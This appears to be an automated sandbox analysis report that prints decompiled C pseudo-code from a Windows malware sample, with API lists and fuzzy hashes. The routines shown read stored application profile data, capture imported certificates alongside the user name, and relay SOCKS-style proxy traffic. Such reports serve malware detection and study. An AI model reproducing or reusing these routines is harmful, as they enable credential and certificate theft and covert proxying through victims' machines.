    • Opcode Fuzzy Hash: 51678386fd146b88d8c0e43e42052caf0dec5df9ff339fb63b05230916cd8118
    • Instruction Fuzzy Hash: 0A512CB2900108BADB20DBA5DD85AEFB7BCEF44304F140176B915F3292DB389E858B64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E004070D0(void* __eflags, intOrPtr _a4) {
    				signed int _v5;
    				short _v20;
    				char _v40;
    				char _v60;
    				short _v84;
    				char _v112;
    				char _v144;
    				short _v664;
    				char _v1184;
    				short _v1704;
    				char _v2224;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t31;
    				long _t33;
    				void* _t36;
    				void* _t42;
    				void* _t44;
    				void* _t46;
    				long _t50;
    				short* _t58;
    				char* _t65;
    				short _t66;
    				void* _t67;
    				WCHAR* _t70;
    				long _t77;
    
    				_t31 = 0x2a;
    				E00419DD3(_t31,  &_v144);
    				_t33 =  &_v1184;
    				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
    				if(_t33 == 0) {
    					_t33 = E00417246( &_v144,  &_v1184,  &_v1184);
    					if(_t33 != 0) {
    						_t36 = 0x2c;
    						E00419DD3(_t36,  &_v112);
    						_t33 = E00417246( &_v112,  &_v1704,  &_v1184);
    						if(_t33 != 0) {
    							_t33 = GetFileAttributesW( &_v1704);
    							if(_t33 != 0xffffffff) {
    								_t42 = 0x2d;
    								E00419DD3(_t42,  &_v60);
    								_t44 = 0x2e;
    								E00419DD3(_t44,  &_v84);
    								_t46 = 0x2f;
    								E00419DD3(_t46,  &_v20);
    								_v5 = 0;
    								while(1) {
    									_push(_v5 & 0x000000ff);
    									_push( &_v60);
    									_t67 = 0xa;
    									_t70 =  &_v40;
    									_t50 = E004126B4( &_v60, _t67, _t70);
    									if(_t50 < 1) {
    										break;
    									}
    									_t50 = GetPrivateProfileIntW(_t70,  &_v84, 0xffffffff,  &_v1704);
    									_t77 = _t50;
    									if(_t77 == 0xffffffff) {
    										break;
    									}
    									_t50 = GetPrivateProfileStringW(_t70,  &_v20, 0,  &_v664, 0x104,  &_v1704);
    									if(_t50 == 0) {
    										L17:
    										_v5 = _v5 + 1;
    										if(_v5 < 0xfa) {
    											continue;
    										}
    										break;
    									}
    									_t58 =  &_v664;
    									if(_v664 == 0) {
    										L12:
    										if(_t77 != 1) {
    											_t65 =  &_v664;
    											L16:
    											_t50 = E00407257(0, _t65, _a4, _t90);
    											if(_t50 == 0) {
    												break;
    											}
    											goto L17;
    										}
    										_t50 = E00417246( &_v664,  &_v2224,  &_v1184);
    										_t90 = _t50;
    										if(_t50 == 0) {
    											goto L17;
    										}
    										_t65 =  &_v2224;
    										goto L16;
    									} else {
    										goto L9;
    									}
    									do {
    										L9:
    										if( *_t58 == 0x2f) {
    											_t66 = 0x5c;
    											 *_t58 = _t66;
    										}
    										_t58 = _t58 + 2;
    									} while ( *_t58 != 0);
    									goto L12;
    								}
    								return _t50;
    							}
    						}
    					}
    				}
    				return _t33;
    			}

    APIs
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 004070F7
      • Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265
    • GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0040714B
    • GetPrivateProfileIntW.KERNEL32 ref: 004071AE
    • GetPrivateProfileStringW.KERNEL32 ref: 004071DA
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: PathPrivateProfile$AttributesCombineFileFolderString
    • String ID:
    • API String ID: 1702184609-0
    • Opcode ID: b4e43f17edb77f586e6fc78cac39189d330523aafacc10ee6f20dd1f1c65135d
    • Instruction ID: d2ef882d69ae63726f85b9dfd0973dcc821cee25746fde66b308505c83b0909d
    • Opcode Fuzzy Hash: b4e43f17edb77f586e6fc78cac39189d330523aafacc10ee6f20dd1f1c65135d
    • Instruction Fuzzy Hash: 53419F72D04218AADF20EAA49C85EDEB3BDAB45314F0400E7F604F71D1D774AE858A5A
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CoCreateInstance.OLE32(004015B0,00000000,00004401,004015A0,?,?,?,?,?,?,?,?,?,0040D346,?,?), ref: 00417E7A
    • VariantInit.OLEAUT32(?), ref: 00417EC6
    • SysAllocString.OLEAUT32(?), ref: 00417ED6
    • VariantClear.OLEAUT32(?), ref: 00417F0F
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Variant$AllocClearCreateInitInstanceString
    • String ID:
    • API String ID: 3126708813-0
    • Opcode ID: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
    • Instruction ID: 32ce9fbc3ff27247e8b4a2105c3d96018cefd55006f8a723bdc245ae3875776a
    • Opcode Fuzzy Hash: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
    • Instruction Fuzzy Hash: F3217E71904228AFCB119BA4CCCCEEFBBB8EF09750F1005A5F906EB291D67599408BA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00417978(signed int __edx, void** __esi, void* _a4, signed int _a8) {
    				char _v5;
    				long _v12;
    				void _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _t26;
    				signed int _t29;
    				signed int _t46;
    				void** _t48;
    
    				_t48 = __esi;
    				_t46 = __edx;
    				_v5 = 0;
    				if(_a8 <= 0xa00000) {
    					_t26 = E00416CC5( *__esi);
    					_v36 = _t26;
    					_v32 = _t46;
    					if((_t26 & _t46) != 0xffffffff && E00416CA5( *__esi, 0, 0, 2) != 0) {
    						_t29 = E00416CC5( *__esi);
    						_v28 = _t29;
    						_v24 = _t46;
    						if((_t29 & _t46) != 0xffffffff) {
    							E00411A74( &_v20,  &_v20, 0, 5);
    							_v20 = __esi[4] ^ _a8;
    							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
    								E00416CA5( *_t48, _v28, _v24, 0);
    								SetEndOfFile( *_t48);
    							} else {
    								_v5 = 1;
    							}
    						}
    						FlushFileBuffers( *_t48);
    						E00416CA5( *_t48, _v36, _v32, 0);
    					}
    				}
    				return _v5;
    			}

    APIs
      • Part of subcall function 00416CC5: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00000000,00000000), ref: 00416CDA
      • Part of subcall function 00416CA5: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00417951,?,00000000,00000000,00000000,00000000), ref: 00416CB7
    • WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 004179F9
    • WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 00417A12
    • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00417A36
    • FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 00417A3E
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$PointerWrite$BuffersFlush
    • String ID:
    • API String ID: 1289656144-0
    • Opcode ID: a9a73e66bee58fe825fb6454e8012d00435f4d7c8b8c73da4c9f268369c57017
    • Instruction ID: b15a50d5df536a20dfb15d84f18357ea1b94287b8b6a0e11a842a36078245b78
    • Opcode Fuzzy Hash: a9a73e66bee58fe825fb6454e8012d00435f4d7c8b8c73da4c9f268369c57017
    • Instruction Fuzzy Hash: A1315E76804108EFDF119FA5CC41DEEBBB9FF08384F14852AF290A51A1E33A8A95DB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040C2E3(void* __ebx, void* __ecx) {
    				char _v20;
    				char* _v84;
    				char _v92;
    				char _v196;
    				char _v716;
    				void* __edi;
    				void* __esi;
    				void* _t15;
    				void* _t31;
    				void* _t35;
    				void* _t36;
    				char _t37;
    				void** _t43;
    
    				_t36 = __ecx;
    				_t35 = __ebx;
    				_t15 =  *(__ebx + 0x180);
    				if(_t15 == 0 || WaitForSingleObject(_t15, 0) != 0x102) {
    					_t43 = _t35 + 0x17c;
    					E004133D0(_t43);
    					E0040666E(_t36,  &_v716, 1);
    					E00406312(0x2937498d,  &_v196, 0);
    					_t37 = 0x44;
    					E00411A74( &_v92,  &_v92, 0, _t37);
    					_v92 = _t37;
    					_v84 =  &_v196;
    					ResetEvent( *(_t35 + 0xc));
    					if(E00413288( &_v716, L"-v", 0,  &_v92,  &_v20) != 0) {
    						E004119FD(_t43,  &_v20, 0x10);
    						if(WaitForSingleObject( *(_t35 + 0xc), 0x3e8) == 0) {
    							goto L6;
    						} else {
    							TerminateProcess( *_t43, 0);
    							E004133D0(_t43);
    							goto L3;
    						}
    					} else {
    						L3:
    						_t31 = 0;
    					}
    				} else {
    					L6:
    					_t31 = 1;
    				}
    				return _t31;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040C2FB
    • ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 0040C355
    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00000010,?,00403400,00000000,?,?), ref: 0040C391
    • TerminateProcess.KERNEL32(?,00000000), ref: 0040C39E
      • Part of subcall function 004133D0: CloseHandle.KERNEL32(?,7519F560,0041AA96,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 004133DF
      • Part of subcall function 004133D0: CloseHandle.KERNEL32(?,7519F560,0041AA96,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 004133E8
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandleObjectSingleWait$EventProcessResetTerminate
    • String ID:
    • API String ID: 401097067-0
    • Opcode ID: dc5acbe1ec0b9cd47354dd5da8324eee94509636cfcf92deee0d9e166540a4ff
    • Instruction ID: 761bd8e4a3ba8afe8f7f4fb860ebea5ca5f80798b442d20a374df077fe077db8
    • Opcode Fuzzy Hash: dc5acbe1ec0b9cd47354dd5da8324eee94509636cfcf92deee0d9e166540a4ff
    • Instruction Fuzzy Hash: 3111BB71500208AADB109FA5DC85FEF7BBCEF45704F04467AF905FA0A5DA789645CA28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041512E(HANDLE* _a4) {
    				struct tagMSG _v28;
    				long _t16;
    
    				while(1) {
    					_t16 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
    					if(_t16 != 1) {
    						break;
    					}
    					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
    						if(_v28.message != 0x12) {
    							TranslateMessage( &_v28);
    							DispatchMessageW( &_v28);
    							continue;
    						}
    						goto L5;
    					}
    				}
    				L5:
    				return _t16;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: MessageMultipleObjectsPeekWait
    • String ID:
    • API String ID: 3986374578-0
    • Opcode ID: 4e14e444bd101229d7f8b9a47b5611f1ce4f606ff8ab428d72acc658b236ca12
    • Instruction ID: db4a99b2ab675b16b60f701b3d7582995fadf95a08b80e5b2655a0c9b4e8b245
    • Opcode Fuzzy Hash: 4e14e444bd101229d7f8b9a47b5611f1ce4f606ff8ab428d72acc658b236ca12
    • Instruction Fuzzy Hash: BCF0F632544309BBD710AA99DC48EEBBBACEB85754F050936FA10E2170D27698448675
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040A2E5(void* __eflags) {
    				void* _t1;
    				void* _t2;
    				long _t6;
    				void* _t12;
    
    				_t1 = E0040634D(_t12, __eflags, 0x19367401, 1);
    				_t19 = _t1;
    				if(_t1 != 0) {
    					_t2 = E00406473();
    					__eflags = _t2;
    					if(_t2 == 0) {
    						L7:
    						E00415194(_t19);
    						__eflags = 0;
    						return 0;
    					}
    					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
    					_t6 = WaitForSingleObject( *0x4229f4, 0x1388);
    					while(1) {
    						__eflags = _t6 - 0x102;
    						if(_t6 != 0x102) {
    							break;
    						}
    						E0041A01E();
    						_t6 = WaitForSingleObject( *0x4229f4, 0x1388);
    					}
    					goto L7;
    				}
    				return _t1 + 1;
    			}

    APIs
      • Part of subcall function 0040634D: CreateMutexW.KERNEL32(00422568,00000000,?,?,?,?,?), ref: 0040636E
    • GetCurrentThread.KERNEL32 ref: 0040A309
    • SetThreadPriority.KERNEL32(00000000,?,?,?,19367401,00000001), ref: 0040A310
    • WaitForSingleObject.KERNEL32(00001388,?,?,?,19367401,00000001), ref: 0040A328
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
    • String ID:
    • API String ID: 3441234504-0
    • Opcode ID: d6f1dc7dce18b87730eb882db9745df98d39ff1c0cca4e6d0b490d0b44f40e9c
    • Instruction ID: 0905efd6015b7175dd0862883eb9a05b3d7096a23aa4b4c50d8e2ae8627ed8f6
    • Opcode Fuzzy Hash: d6f1dc7dce18b87730eb882db9745df98d39ff1c0cca4e6d0b490d0b44f40e9c
    • Instruction Fuzzy Hash: 7AF0E9B2604308BAD6113BA5AD45DBB3A0DEB45358B240137BD05F21E2D6B94CA1527E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00413036(intOrPtr _a4) {
    				intOrPtr _v20;
    				void* _v32;
    				signed int _t6;
    				signed int _t7;
    				int _t9;
    				int _t14;
    				void* _t15;
    
    				_t14 = 0;
    				_t6 = CreateToolhelp32Snapshot(4, 0);
    				_t15 = _t6;
    				_t7 = _t6 | 0xffffffff;
    				if(_t15 != _t7) {
    					_v32 = 0x1c;
    					_t9 = Thread32First(_t15,  &_v32);
    					while(_t9 != 0) {
    						if(_v20 == _a4) {
    							_t14 = _t14 + 1;
    						}
    						_t9 = Thread32Next(_t15,  &_v32);
    					}
    					CloseHandle(_t15);
    					return _t14;
    				}
    				return _t7;
    			}

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00413043
    • Thread32First.KERNEL32 ref: 0041305E
    • Thread32Next.KERNEL32 ref: 00413074
    • CloseHandle.KERNEL32(00000000), ref: 0041307F
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
    • String ID:
    • API String ID: 3643885135-0
    • Opcode ID: 8745815149a873f12b4925ecfef575c332347333b19a6d6ec226962fb04f8061
    • Instruction ID: 27246d0090026b0f7170c3c43011ae4e6fefbe123c2443cefe0d361b416c3b14
    • Opcode Fuzzy Hash: 8745815149a873f12b4925ecfef575c332347333b19a6d6ec226962fb04f8061
    • Instruction Fuzzy Hash: 7DF08975900015ABD720AF69DD48DEF7FFCEB89351B004126FA11F2298D7389A45C6B9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E00409C13(void* __eflags, signed int _a4) {
    				char _v9;
    				char _v13;
    				char _v20;
    				signed int _v24;
    				signed int _v29;
    				short _v31;
    				signed char _v32;
    				intOrPtr _v36;
    				signed int _v48;
    				short _v50;
    				char _v52;
    				char _v312;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t59;
    				void* _t61;
    				short _t77;
    				void* _t79;
    				void* _t84;
    				char _t103;
    				char* _t105;
    				signed int _t115;
    				void* _t125;
    				intOrPtr _t126;
    				void* _t127;
    				char _t129;
    				void* _t131;
    				intOrPtr _t132;
    				void* _t133;
    
    				_t110 = _a4;
    				_t59 = E00414F79(_t110);
    				_push(0);
    				_push( &_v32);
    				_t61 = 7;
    				_v24 = 0 | _t59 == 0x00000017;
    				if(E00414974(_t61, _t110) != 0) {
    					while(E00414974(1, _t110,  &_v9, 0) != 0) {
    						if(_v9 == 0) {
    							_t115 = _v29;
    							_t116 = _t115 << 0x10;
    							_v13 = 0x5a;
    							if(((_t115 & 0x00ff0000 | _t115 >> 0x00000010) >> 0x00000008 | (_t115 & 0x0000ff00 | _t115 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
    								L20:
    								_v9 = 1;
    								if(_v13 != 0x5a) {
    									L44:
    									return E00409B9D(_t110, 0xffffffff, _v13, _v24) & 0xffffff00 | _t73 != 0x00000000;
    								}
    								E00411A74( &_v52,  &_v52, 0, 0x10);
    								_t77 = 2;
    								_v52 = _t77;
    								_t79 = (_v32 & 0x000000ff) - 1;
    								if(_t79 == 0) {
    									_v50 = _v31;
    									_v48 = _v29;
    									_t127 = E00414A09( &_v52);
    									if(_t127 == 0xffffffff) {
    										L23:
    										_v13 = 0x5b;
    										goto L44;
    									}
    									E00414DBC(_t116, _t127);
    									_t84 = E00409B9D(_t110, _t127, 0x5a, _v24);
    									if(_t84 != 1) {
    										if(_t84 != 0xffffffff) {
    											_v9 = 0;
    										} else {
    											_v13 = 0x5b;
    										}
    									} else {
    										_push(_t127);
    										_t84 = E00414BBD(_t110);
    									}
    									E00414D64(_t84, _t127);
    									if(_v9 != 1 || _v13 == 0x5a) {
    										L34:
    										return _v9;
    									} else {
    										goto L44;
    									}
    								}
    								if(_t79 == 1) {
    									_t129 = E00414B03( &_v52, 1);
    									_v20 = _t129;
    									if(_t129 == 0xffffffff) {
    										goto L23;
    									}
    									_t125 = E00409B9D(_t110, _t129, 0x5a, _v24);
    									if(_t125 != 1) {
    										L31:
    										E00414D64(_t89, _t129);
    										if(_t125 == 0xffffffff) {
    											goto L23;
    										}
    										if(_t125 != 1) {
    											_v9 = 0;
    										}
    										goto L34;
    									}
    									_t126 = E00414D34( &_v20,  &_a4);
    									_v36 = _t126;
    									E00414D64(_t93, _v20);
    									if(_t126 != 0xffffffff) {
    										E00414DBC(_t116, _t126);
    										_t110 = _a4;
    										_t125 = E00409B9D(_a4, _t126, 0x5a, _v24 | 0x00000002);
    										if(_t125 == 1) {
    											_push(_v36);
    											_t89 = E00414BBD(_t110);
    										}
    										_t129 = _v36;
    										goto L31;
    									}
    									_t110 = _a4;
    									_v13 = 0x5b;
    									goto L44;
    								}
    								goto L23;
    							}
    							_t131 = 0;
    							while(1) {
    								_t116 = _t110;
    								if(E00414974(1, _t110,  &_v9, 0) == 0) {
    									goto L1;
    								}
    								_t103 = _v9;
    								 *((char*)(_t133 + _t131 - 0x134)) = _t103;
    								if(_t103 == 0) {
    									_t105 =  &_v312;
    									_v20 = 0;
    									__imp__getaddrinfo(_t105, 0, 0,  &_v20);
    									if(_t105 == 0) {
    										_t132 = _v20;
    										while(_t132 != 0) {
    											if( *((intOrPtr*)(_t132 + 4)) == 2) {
    												E004119FD( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4);
    												L19:
    												__imp__freeaddrinfo(_v20);
    												if(_t132 == 0) {
    													goto L12;
    												}
    												goto L20;
    											}
    											_t132 =  *((intOrPtr*)(_t132 + 0x1c));
    										}
    										goto L19;
    									}
    									L12:
    									_v13 = 0x5b;
    									goto L20;
    								}
    								_t131 = _t131 + 1;
    								if(_t131 <= 0xff) {
    									continue;
    								}
    								goto L1;
    							}
    							goto L1;
    						}
    					}
    				}
    				L1:
    				return 0;
    			}

    APIs
      • Part of subcall function 00414F79: getsockname.WS2_32(?,?,?), ref: 00414F97
    • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00409CE2
    • freeaddrinfo.WS2_32(?,?,?,00000004), ref: 00409D1B
      • Part of subcall function 00414DBC: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 00414DD2
      • Part of subcall function 00409B9D: getpeername.WS2_32(000000FF,00000000,00000000), ref: 00409BC1
      • Part of subcall function 00414BBD: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00414C5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: freeaddrinfogetaddrinfogetpeernamegetsocknameselectsetsockopt
    • String ID: Z
    • API String ID: 1849152701-1505515367
    • Opcode ID: e3c875e8580555f271ac47944e713231f5603c76ba3a90d48e5f93317c8855b4
    • Instruction ID: a830ca4c63c0a136eda8e5029f32784d9f97a13a694c305c4d3f1b8d25c8eb54
    • Opcode Fuzzy Hash: e3c875e8580555f271ac47944e713231f5603c76ba3a90d48e5f93317c8855b4
    • Instruction Fuzzy Hash: 14611632D04258AADF20AAA9CC45AEF77B9AF85314F04457BF911B32D3C63C8D45C76A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 60%
    			E0040C8AB(intOrPtr __eax, void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
    				char _v536;
    				char _v600;
    				char _v728;
    				char _v744;
    				struct _SYSTEMTIME _v760;
    				intOrPtr _v764;
    				intOrPtr _v772;
    				intOrPtr _v776;
    				char _v784;
    				void* __edi;
    				void* __esi;
    				void* _t47;
    				void* _t58;
    				intOrPtr* _t59;
    				void* _t61;
    				void* _t65;
    				intOrPtr* _t66;
    				void* _t67;
    				void* _t71;
    				char* _t74;
    				signed int _t76;
    				void* _t78;
    				void* _t79;
    
    				_t61 = __ecx;
    				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
    				_t59 = _a4;
    				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58);
    				_v776 = __eax;
    				if(__eax != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E00406473() != 0) {
    					GetSystemTime( &_v760);
    					E00419DD3(0xaa,  &_v600);
    					_t74 =  &_v744;
    					E00419DD3(0xab, _t74);
    					E0040C68A( &_v536, _t61);
    					_push(_v760.wYear & 0x0000ffff);
    					_push(_v760.wMonth & 0x0000ffff);
    					_push(_v760.wDay & 0x0000ffff);
    					_push(_t74);
    					_push( &_v536);
    					_push( &_v600);
    					_t65 = 0x3e;
    					_t47 = E004126B4( &_v600, _t65,  &_v728);
    					_t79 = _t78 + 0x18;
    					if(_t47 > 0 && E0040B8B7(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
    						_t66 = _a8;
    						if(_t66 != 0 &&  *_t66 != 0) {
    							 *((short*)(E004119FD(_t79 + 0x48 + E00412510( &_v728) * 2, L".txt", 8) + 8)) = 0;
    							_t64 = _t66;
    							if(E00412818(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
    								E0040B8B7(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
    								E00412806( &_v784);
    							}
    						}
    					}
    				}
    				return _v776;
    			}

    APIs
    • PFXImportCertStore.CRYPT32(?,?,?), ref: 0040C8C4
      • Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B
    • GetSystemTime.KERNEL32(?), ref: 0040C910
      • Part of subcall function 0040C68A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0040C7E1,?,?,00000000), ref: 0040C69F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
    • String ID: .txt
    • API String ID: 1412380219-2195685702
    • Opcode ID: 03634207a40ecfb8661577a64da5af2b4e8534af22a1da0a46d78374d6ca9545
    • Instruction ID: e668a7ab3177a77715ac4e98b626459444f29f3581ab23a7d17919d0296052ed
    • Opcode Fuzzy Hash: 03634207a40ecfb8661577a64da5af2b4e8534af22a1da0a46d78374d6ca9545
    • Instruction Fuzzy Hash: A731B071100340DBCB20AF95C982FABB7A8EF98304F04462FF994E62D1D779D944C76A
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CoCreateInstance.OLE32(0040346C,00000000,00004401,0040347C,?,?,00000000,00000001), ref: 0040CCB1
    • CoCreateInstance.OLE32(0040343C,00000000,00004401,0040344C,?,?,00000000,00000001), ref: 0040CD04
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateInstance
    • String ID: D
    • API String ID: 542301482-2746444292
    • Opcode ID: 17f67add6a3f40f78143ad53b35499c2786be7ed58b7017445b3a7cdc9201742
    • Instruction ID: 184b066137aa604f3ab3a170599fe6c966207caff02cd2b4e11982d87ab4c9cf
    • Opcode Fuzzy Hash: 17f67add6a3f40f78143ad53b35499c2786be7ed58b7017445b3a7cdc9201742
    • Instruction Fuzzy Hash: B5315CB2204205AFE710DF64CCC5D6BBBECAF84744F10463AF954A7290E734DC468BA6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E0041601A(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
    				signed int _v14;
    				signed int _v16;
    				signed int _v20;
    				char _v284;
    				unsigned int _t24;
    				void* _t26;
    				signed int _t28;
    				signed int* _t29;
    				void* _t30;
    				void* _t41;
    				char* _t42;
    				void* _t45;
    				signed int _t46;
    				void* _t47;
    
    				_t45 = __ecx;
    				_t24 = E004119FD( &_v20, _a4, 0x10);
    				_v20 = _v20 ^ _t24;
    				_v16 = _v16 ^ _t24;
    				_v14 = _v14 ^ _t24 >> 0x00000010;
    				_t41 = 0;
    				_t26 = 0;
    				do {
    					 *(_t47 + _t41 - 8) =  *(_t47 + _t41 - 8) ^  *(_t47 + _t26 + 0xc);
    					_t26 = _t26 + 1;
    					if(_t26 == 4) {
    						_t26 = 0;
    					}
    					_t41 = _t41 + 1;
    				} while (_t41 < 8);
    				if(_a12 != 0) {
    					E004119FD( &_v284, _a12, 0x102);
    					E00412E3D( &_v284, _t41,  &_v20, 0x10);
    				}
    				_t28 = _a16 & 0x000000ff;
    				if(_t28 != 0) {
    					_t30 = _t28 - 1;
    					if(_t30 == 0) {
    						_t42 = L"Local\\";
    						_push(6);
    						goto L11;
    					} else {
    						if(_t30 == 1) {
    							_t42 = L"Global\\";
    							_push(7);
    							L11:
    							_pop(_t46);
    							E00411D62(_t46, _t42, _t45);
    							_t45 = _t45 + _t46 * 2;
    						}
    					}
    				}
    				_t29 =  &_v20;
    				__imp__StringFromGUID2(_t29, _t45, 0x28);
    				return _t29;
    			}

    APIs
    • StringFromGUID2.OLE32(00000000,?,00000028,00406347,?,00000010,00000000,77A19EB0), ref: 004160BB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
